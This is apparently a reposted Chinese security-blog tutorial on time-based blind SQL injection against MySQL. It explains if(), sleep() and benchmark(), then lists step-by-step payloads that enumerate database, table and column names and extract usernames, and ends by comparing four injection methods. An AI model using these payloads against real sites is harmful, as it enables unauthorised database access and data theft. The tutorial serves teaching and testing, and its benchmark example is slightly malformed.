SQL注入5之时间延迟注入 – 作者:iamYit

免责声明

该文章仅用于信息防御技术的交流和学习，请勿用于其他用途； 在未得到网站授权前提下，禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试；技术是把双刃剑，请遵纪守法，做一名合格的白帽子安全专家，为国家的网络安全事业做出贡献

SQL注入之时间延迟型注入

原理：利用if函数，执行判断；如果正确，直接返回（时间很短，网速有一定影响）如果不正确，执行时间延迟，常用的函数有sleep和benchmark以上操作也可以反过来。

适用环境：界面无法用布尔真假判断，也无法报错注入的情况下

时间延迟注入常用SQL函数介绍

if(condition,expr1,expr2)

功能：如果condition是true，则if()的返回值是expr1，否则返回值则为expr2，if()的返回值为数字值或字符串，具体情况视其所在语境而定

举例：select if(1+1=2,1,0); select if(1+1=3,1,0)结果： 1 ; 0

sleep(arg1)

功能：arg1为中断的时间，单位为秒；

举例1：if(payload,sleep(5),1);如果测试语句正确，暂停5秒

benchmark(arg1,arg2)

功能：arg1操作次数，arg2为表达式

举例1：if(payload,benchmark(500000000),1)；如果测试语句正确，暂停5秒左右，受服务器影响较大

if和sleep的结合使用

语句：select if(left(version(),1)=5,sleep(5),2)

时间延迟SQL注入步骤

第1步：确认注入点

方法：通过增加 ‘ 和增加–+ 注释符，语句从执行失败变为执行成功判断注入点语句：?id=1’ –+

第2步：判断数据库版本和当前数据库名长度

1、判断数据库版本

?id=1′ and if(ascii(substr(version(),0,1))=5,1,sleep(5))–+

2、判断数据库名长度

?id=1′ and if(length(database())>10,1,sleep(5))–+

第3步：爆数据库名

?id=1′ and if(ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))>10,1,sleep(5))–+

第4步：猜解数据表名

?id=1′ and if(ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1))>10,1,sleep(5))–+

第5步：猜解数据表 列名

?id=1′ and if(ascii(substr((select column_name from information_schema.columns where table_name=’users’ limit 0,1),1,1))>10,1,sleep(5))–+

第6步：猜解数据包内容

?id=1′ and if(ascii(substr((select username from security.users limit 0,1),1,1))>20,1,sleep(5))–+

四种方式分析

union注入：

能直接显示出想要的数据，使用简单

报错注入：

输入错误会直接显示数据库错误信息，我们可以通过报错注入直接获取想要的信息，与union注入相比，稍微麻烦一点，但是能直接显示信息

布尔注入：

会间接显示查询语句是否正确，但不会显示关键信息，重复操作多

时间注入：

不管SQL语句是否正确，不会返回任何信息，只能通过页面缓冲的时间来判断

综上所述

如果能够直接union是最好的，如果爆出了数据库错误可以使用报错注入，如果没有明显错误但是间接反馈了语句是否执行正确，可以布尔注入，如果什么信息都没有返回只有试试时间延迟注入。

来源：freebuf.com 2021-05-28 22:03:19 by: iamYit